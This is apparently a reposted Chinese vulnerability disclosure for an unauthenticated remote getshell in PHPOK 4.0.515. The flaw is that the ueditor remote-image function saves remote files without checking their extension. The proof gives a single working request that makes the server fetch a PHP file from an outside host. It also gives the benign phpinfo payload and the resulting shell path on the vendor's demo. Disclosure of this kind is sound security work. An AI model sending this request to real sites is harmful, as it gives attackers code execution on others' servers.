phpok通杀前台getshell 4.0.515官方demo测试成功

  • A+
所属分类:漏洞时代
摘要

无任何限制,不用注册账号,不用csrf,不用注入。一个请求直接getshell。
不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题


漏洞作者: 索马里的海贼

简要描述:

无任何限制,不用注册账号,不用csrf,不用注入。一个请求直接getshell。
不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明:

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明:

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php  我这里1.txt的内容是
<?php phpinfo();?>  测试问题嘛 不做破坏  phpok通杀前台getshell 4.0.515官方demo测试成功  shell地址直接返回了。这里不返回也没事,文件名可以自己算出来。 http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php  phpok通杀前台getshell 4.0.515官方demo测试成功  

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: